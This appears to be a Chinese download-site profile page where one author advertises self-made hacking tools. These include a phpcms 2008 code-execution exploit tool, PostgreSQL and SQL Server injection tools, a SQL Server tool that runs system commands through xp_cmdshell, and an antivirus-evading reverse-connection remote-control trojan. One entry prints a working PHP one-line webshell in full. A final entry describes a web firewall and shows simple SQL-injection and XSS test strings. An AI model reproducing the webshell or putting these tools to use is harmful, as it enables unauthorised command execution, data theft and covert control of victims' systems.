- 博客(0)
- 资源 (15)
- 收藏
- 关注
RSS订阅phpcms2008 yp/prodcut.php 代码执行漏洞 利用工具
phpcms 2008 yp/product.php 文件pagesize参数没有过滤,导致执行任意php代码,利用前提pagesize>1。
2012-09-05
河马PostgreSQL注入工具v1.0
这个工具可以通过web接口,获取postgreSQL数据库的内容,
支持:数据获取
支持:文件读取。
contact me :[email protected]
2012-05-11
SQL Server弱口令利用工具1.3版
这个工具使用sql server 的一些功能,执行操作系统命令,
support xp_cmdshell execute arbtriry command
support sp_OACreate create Wscript.shell execute arbtriry commnad
support xp_dirtree list system directroy
support execute SQL Query
contact me :[email protected]
2012-05-11
php一句话webshell 服务端和客户端
php一句话webshell 服务端和客户端,一句话为
<?php $_GET[2]($_GET[0]($_GET[1]));?>
支持函数system,passthru,shell_exec
可以执行操作系统任意命令,windows linux unix 等。
[email protected],欢迎下载使用,本软件为免费版。
2012-05-11
河马SQLServer数据库专用注入工具v1.0
利用前提,存在php+sqlserver数据库的注入点,或asp+sqlserver数据库的注入点,
或jsp+sqlserver数据库的注入点,就可以利用本工具,查询表,字段,数据,并且
可以执行系统cmd命令和显示主机系统目录列表,这个工具有一个亮点是支持cookie
和身份验证。
速度很快,一款不错的工具,值得收藏。
这是网上唯一一款支持cookie的注入工具。
2011-05-04
河马远控3.1免杀版
大家好,今天给大家带来一款我自主开发的 采用反弹端口技术 远程控制软件
版本是3.1
该版本主要实现了以下功能:
1. 远程控制
2. 屏幕查看
3. 文件传输
4. Telnet超级终端
5. 卸载服务端
使用方法如下
先配置一个服务端,
点击生成服务端
域名和ip地址这里填写,被控端要连接的动态域名或静态ip地址
端口这里我填写80
然后将服务端运行一下,我这里在虚拟机下运行。
现在等待被控端上线,一般为1分钟内
等待
好了 已经上线了
好了, 完,有什么问题可以QQ上联系。
软件作者: 赵显阳
QQ:343561636
Email:[email protected]
2010-08-27
河马web应用防火墙
大家好,
今天给大家带来了我的新作品,iis web应用防火墙,
具有防sql注入攻击和防跨站脚本攻击的功能。
看安装动画
重启一下iis
安装完成后看我测试
http://192.168.16.186/quit.asp 这是一个正常页面
http://192.168.16.186/quit.asp?id=654321' 在连接的最后加单引号 系统报错
防火墙检测到SQL注入攻击
http://192.168.16.186/quit.asp?id=654321<script>alert(/xss)</script>
防火墙检测到跨站脚本(xss)攻击
完
作者:赵显阳
qq: 343561636
email:[email protected]
版本:v 1.0
2010-7-23
2010-07-23
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人